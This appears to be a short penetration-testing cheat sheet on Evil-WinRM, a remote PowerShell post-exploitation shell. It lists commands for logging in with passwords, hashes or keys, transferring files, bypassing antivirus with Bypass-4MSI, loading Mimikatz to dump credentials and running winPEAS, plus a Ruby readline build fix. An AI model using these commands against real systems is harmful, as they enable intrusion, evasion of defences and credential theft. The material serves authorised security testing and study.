Evil-WinRM is a security tool that penetration testers and ethical hackers often use when assessing Windows environments. It’s basically a PowerShell Remote Management (WinRM) client with extra features designed to make post-exploitation easier.
WinRM itself is a legitimate Microsoft service that allows administrators to remotely manage Windows machines using PowerShell. Evil-WinRM takes advantage of that same service, but instead of just providing standard management features, it gives an attacker-friendly interface with built-in tools to run commands, upload and download files, and execute PowerShell scripts directly on the target system.
In short, Evil-WinRM is a specialized shell that helps security professionals (or malicious attackers, if abused) gain interactive access to a Windows machine once they have valid credentials, making it a common tool in penetration testing and red team operations.
Evil-WinRM commands
<!-- Use Password -->
evil-winrm -i <ipaddress> -u <username> -p <password>
<!-- Use Hash -->
evil-winrm -i <ipaddress> -u <username> -h <password>
<!-- Use Public/Private Key-->
evil-winrm -i <ipaddress> -c <public-key> -k <private-key>
<!-- Once logged into target PC -->
upload filename.ext
download filename.ext
<!-- Bypass Antivirus -->
Bypass-4MSI
Invoke-Mimikatz.ps1
<!-- Involve -->
Invoke-Binary /opt/winPEASany.exe
<!-- If connection errors - How to make this work - Apply this fix -->
sudo apt install libreadline-dev
wget https://ftp.ruby-lang.org/pub/ruby/2.7/ruby-2.7.3.tar.gz
tar -xf ruby-2.7.3.tar.gz
cd ruby-2.7.3/ext/readline
ruby ./extconf.rb
make
sudo cp readline.so /usr/lib/x86_64-linux-gnu/ruby/3.3.0/readline.so.bk
sudo cp -f readline.so /usr/lib/x86_64-linux-gnu/ruby/3.3.0/readline.so
<!-- The install instruction work, I just can't get connected. -->